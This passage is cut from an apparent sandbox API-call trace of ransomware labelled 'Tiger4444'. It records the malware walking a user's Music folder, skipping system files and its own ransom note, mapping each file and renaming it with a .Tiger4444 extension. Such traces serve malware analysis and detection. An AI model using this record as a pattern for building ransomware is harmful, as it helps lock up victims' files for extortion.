lpName=0x0) returned 0x2c8 [0045.967] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12c60) returned 0xbe0000 [0045.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.969] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13742258717) returned 1 [0045.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0045.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0045.970] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.970] CloseHandle (hObject=0x2c8) returned 1 [0045.970] CloseHandle (hObject=0x260) returned 1 [0045.973] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\926rqjMJjcledBP-.m4a.Tiger4444") returned 70 [0045.973] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\926rqjMJjcledBP-.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\926rqjmjjcledbp-.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\926rqjMJjcledBP-.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\926rqjmjjcledbp-.m4a.tiger4444"), dwFlags=0x1) returned 1 [0045.973] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=76128 | out: Addend=0xc6f980) returned 19282912 [0045.973] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4569 [0045.973] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573bb040, ftCreationTime.dwHighDateTime=0x1d4c9ff, ftLastAccessTime.dwLowDateTime=0x866248f0, ftLastAccessTime.dwHighDateTime=0x1d4c83f, ftLastWriteTime.dwLowDateTime=0x866248f0, ftLastWriteTime.dwHighDateTime=0x1d4c83f, nFileSizeHigh=0x0, nFileSizeLow=0x154a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H9vaiExm-o.mp3", cAlternateFileName="H9VAIE~1.MP3")) returned 1 [0045.973] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.973] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.973] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2="Tiger4444.exe") returned -1 [0045.974] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2=".") returned 1 [0045.974] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2="..") returned 1 [0045.974] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2="windows") returned -1 [0045.974] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2="bootmgr") returned 1 [0045.974] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2="pagefile.sys") returned -1 [0045.974] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2="boot") returned 1 [0045.974] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2="ids.txt") returned -1 [0045.974] lstrcmpiW (lpString1="H9vaiExm-o.mp3", lpString2="NTUSER.DAT") returned -1 [0045.974] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="H9vaiExm-o.mp3" | out: lpString1="H9vaiExm-o.mp3") returned="H9vaiExm-o.mp3" [0045.974] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\H9vaiExm-o.mp3", dwFileAttributes=0x0) returned 1 [0045.974] lstrlenW (lpString="H9vaiExm-o.mp3") returned 14 [0045.974] lstrlenW (lpString="Tiger4444") returned 9 [0045.974] lstrcmpiW (lpString1="Exm-o.mp3", lpString2="Tiger4444") returned -1 [0045.974] lstrlenW (lpString=".dll") returned 4 [0045.974] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0045.974] lstrlenW (lpString=".lnk") returned 4 [0045.974] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0045.974] lstrlenW (lpString=".ini") returned 4 [0045.974] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0045.974] lstrlenW (lpString=".sys") returned 4 [0045.974] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0045.974] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\H9vaiExm-o.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\h9vaiexm-o.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.974] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.974] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13742753584) returned 1 [0045.974] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=87204) returned 1 [0045.975] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0045.975] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0045.975] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x157b0, lpName=0x0) returned 0x2c8 [0045.975] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x157b0) returned 0xbe0000 [0045.976] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.976] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.976] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.977] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.977] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.977] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13742999232) returned 1 [0045.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0045.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0045.977] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.978] CloseHandle (hObject=0x2c8) returned 1 [0045.978] CloseHandle (hObject=0x260) returned 1 [0045.981] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\H9vaiExm-o.mp3.Tiger4444") returned 64 [0045.981] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\H9vaiExm-o.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\h9vaiexm-o.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\H9vaiExm-o.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\h9vaiexm-o.mp3.tiger4444"), dwFlags=0x1) returned 1 [0045.981] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=87216 | out: Addend=0xc6f980) returned 19359040 [0045.981] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4571 [0045.981] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f84b0e0, ftCreationTime.dwHighDateTime=0x1d4cb2f, ftLastAccessTime.dwLowDateTime=0x80c6c470, ftLastAccessTime.dwHighDateTime=0x1d4ce07, ftLastWriteTime.dwLowDateTime=0x80c6c470, ftLastWriteTime.dwHighDateTime=0x1d4ce07, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JvO3tXgHMCsM-", cAlternateFileName="JVO3TX~1")) returned 1 [0045.981] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.982] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.982] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2="Tiger4444.exe") returned -1 [0045.982] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2=".") returned 1 [0045.982] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2="..") returned 1 [0045.982] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2="windows") returned -1 [0045.982] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2="bootmgr") returned 1 [0045.982] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2="pagefile.sys") returned -1 [0045.982] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2="boot") returned 1 [0045.982] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2="ids.txt") returned 1 [0045.982] lstrcmpiW (lpString1="JvO3tXgHMCsM-", lpString2="NTUSER.DAT") returned -1 [0045.982] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="JvO3tXgHMCsM-" | out: lpString1="JvO3tXgHMCsM-") returned="JvO3tXgHMCsM-" [0045.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663a0 [0045.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6c) returned 0xc89a40 [0045.982] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc663a8 | out: ListHead=0xc66828, ListEntry=0xc663a8) returned 0xc66348 [0045.982] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7e8c440, ftCreationTime.dwHighDateTime=0x1d4c713, ftLastAccessTime.dwLowDateTime=0xc6e923c0, ftLastAccessTime.dwHighDateTime=0x1d4c9ad, ftLastWriteTime.dwLowDateTime=0xc6e923c0, ftLastWriteTime.dwHighDateTime=0x1d4c9ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nK_uPGc", cAlternateFileName="")) returned 1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2="Tiger4444.exe") returned -1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2=".") returned 1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2="..") returned 1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2="windows") returned -1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2="bootmgr") returned 1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2="pagefile.sys") returned -1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2="boot") returned 1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2="ids.txt") returned 1 [0045.982] lstrcmpiW (lpString1="nK_uPGc", lpString2="NTUSER.DAT") returned -1 [0045.982] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="nK_uPGc" | out: lpString1="nK_uPGc") returned="nK_uPGc" [0045.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66440 [0045.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x60) returned 0xc5e610 [0045.982] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66448 | out: ListHead=0xc66828, ListEntry=0xc66448) returned 0xc663a8 [0045.982] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x127ab8c0, ftCreationTime.dwHighDateTime=0x1d4c892, ftLastAccessTime.dwLowDateTime=0x822a96e0, ftLastAccessTime.dwHighDateTime=0x1d4cf8b, ftLastWriteTime.dwLowDateTime=0x822a96e0, ftLastWriteTime.dwHighDateTime=0x1d4cf8b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NV_iQ", cAlternateFileName="")) returned 1 [0045.982] lstrcmpiW (lpString1="NV_iQ", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.982] lstrcmpiW (lpString1="NV_iQ", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.982] lstrcmpiW (lpString1="NV_iQ", lpString2="Tiger4444.exe") returned -1 [0045.982] lstrcmpiW (lpString1="NV_iQ", lpString2=".") returned 1 [0045.982] lstrcmpiW (lpString1="NV_iQ", lpString2="..") returned 1 [0045.982] lstrcmpiW (lpString1="NV_iQ", lpString2="windows") returned -1 [0045.982] lstrcmpiW (lpString1="NV_iQ", lpString2="bootmgr") returned 1 [0045.982] lstrcmpiW (lpString1="NV_iQ", lpString2="pagefile.sys") returned -1 [0045.982] lstrcmpiW (lpString1="NV_iQ", lpString2="boot") returned 1 [0045.983] lstrcmpiW (lpString1="NV_iQ", lpString2="ids.txt") returned 1 [0045.983] lstrcmpiW (lpString1="NV_iQ", lpString2="NTUSER.DAT") returned 1 [0045.983] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="NV_iQ" | out: lpString1="NV_iQ") returned="NV_iQ" [0045.983] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0045.983] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x5c) returned 0xc60fe8 [0045.983] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc66448 [0045.983] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e37d260, ftCreationTime.dwHighDateTime=0x1d4d3ca, ftLastAccessTime.dwLowDateTime=0x2c263ee0, ftLastAccessTime.dwHighDateTime=0x1d4ca52, ftLastWriteTime.dwLowDateTime=0x2c263ee0, ftLastWriteTime.dwHighDateTime=0x1d4ca52, nFileSizeHigh=0x0, nFileSizeLow=0xcf1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OUfb1R.wav", cAlternateFileName="")) returned 1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2="Tiger4444.exe") returned -1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2=".") returned 1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2="..") returned 1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2="windows") returned -1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2="bootmgr") returned 1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2="pagefile.sys") returned -1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2="boot") returned 1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2="ids.txt") returned 1 [0045.983] lstrcmpiW (lpString1="OUfb1R.wav", lpString2="NTUSER.DAT") returned 1 [0045.983] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="OUfb1R.wav" | out: lpString1="OUfb1R.wav") returned="OUfb1R.wav" [0045.983] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\OUfb1R.wav", dwFileAttributes=0x0) returned 1 [0045.983] lstrlenW (lpString="OUfb1R.wav") returned 10 [0045.983] lstrlenW (lpString="Tiger4444") returned 9 [0045.983] lstrcmpiW (lpString1="Ufb1R.wav", lpString2="Tiger4444") returned 1 [0045.983] lstrlenW (lpString=".dll") returned 4 [0045.983] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0045.983] lstrlenW (lpString=".lnk") returned 4 [0045.983] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0045.983] lstrlenW (lpString=".ini") returned 4 [0045.983] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0045.983] lstrlenW (lpString=".sys") returned 4 [0045.983] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0045.984] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\OUfb1R.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\oufb1r.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.984] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.984] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13743677215) returned 1 [0045.984] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=53018) returned 1 [0045.984] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0045.984] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0045.984] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd220, lpName=0x0) returned 0x2c8 [0045.984] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd220) returned 0xbe0000 [0045.986] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.986] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.986] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.986] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.986] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.986] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.986] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.986] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.986] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13743908235) returned 1 [0045.986] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0045.986] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0045.986] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.987] CloseHandle (hObject=0x2c8) returned 1 [0045.987] CloseHandle (hObject=0x260) returned 1 [0045.989] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\OUfb1R.wav.Tiger4444") returned 60 [0045.989] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\OUfb1R.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\oufb1r.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\OUfb1R.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\oufb1r.wav.tiger4444"), dwFlags=0x1) returned 1 [0045.989] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=53024 | out: Addend=0xc6f980) returned 19446256 [0045.989] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4573 [0045.990] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9e340, ftCreationTime.dwHighDateTime=0x1d4c7d9, ftLastAccessTime.dwLowDateTime=0x8da5d450, ftLastAccessTime.dwHighDateTime=0x1d4cefd, ftLastWriteTime.dwLowDateTime=0x8da5d450, ftLastWriteTime.dwHighDateTime=0x1d4cefd, nFileSizeHigh=0x0, nFileSizeLow=0x134f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u3Lej26cURF7pFaUavmI.wav", cAlternateFileName="U3LEJ2~1.WAV")) returned 1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2="Tiger4444.exe") returned 1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2=".") returned 1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2="..") returned 1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2="windows") returned -1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2="bootmgr") returned 1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2="pagefile.sys") returned 1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2="boot") returned 1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2="ids.txt") returned 1 [0045.990] lstrcmpiW (lpString1="u3Lej26cURF7pFaUavmI.wav", lpString2="NTUSER.DAT") returned 1 [0045.990] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="u3Lej26cURF7pFaUavmI.wav" | out: lpString1="u3Lej26cURF7pFaUavmI.wav") returned="u3Lej26cURF7pFaUavmI.wav" [0045.990] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\u3Lej26cURF7pFaUavmI.wav", dwFileAttributes=0x0) returned 1 [0045.990] lstrlenW (lpString="u3Lej26cURF7pFaUavmI.wav") returned 24 [0045.990] lstrlenW (lpString="Tiger4444") returned 9 [0045.990] lstrcmpiW (lpString1="UavmI.wav", lpString2="Tiger4444") returned 1 [0045.990] lstrlenW (lpString=".dll") returned 4 [0045.990] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0045.990] lstrlenW (lpString=".lnk") returned 4 [0045.990] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0045.990] lstrlenW (lpString=".ini") returned 4 [0045.990] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0045.990] lstrlenW (lpString=".sys") returned 4 [0045.990] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0045.990] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\u3Lej26cURF7pFaUavmI.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\u3lej26curf7pfauavmi.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.990] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.990] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13744360338) returned 1 [0045.991] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=79090) returned 1 [0045.991] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0045.991] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0045.991] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13800, lpName=0x0) returned 0x2c8 [0045.994] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13800) returned 0xbe0000 [0045.997] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.997] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.997] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.997] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.997] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13745051655) returned 1 [0045.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0045.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0045.998] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.998] CloseHandle (hObject=0x2c8) returned 1 [0045.998] CloseHandle (hObject=0x260) returned 1 [0046.001] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\u3Lej26cURF7pFaUavmI.wav.Tiger4444") returned 74 [0046.001] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\u3Lej26cURF7pFaUavmI.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\u3lej26curf7pfauavmi.wav"), 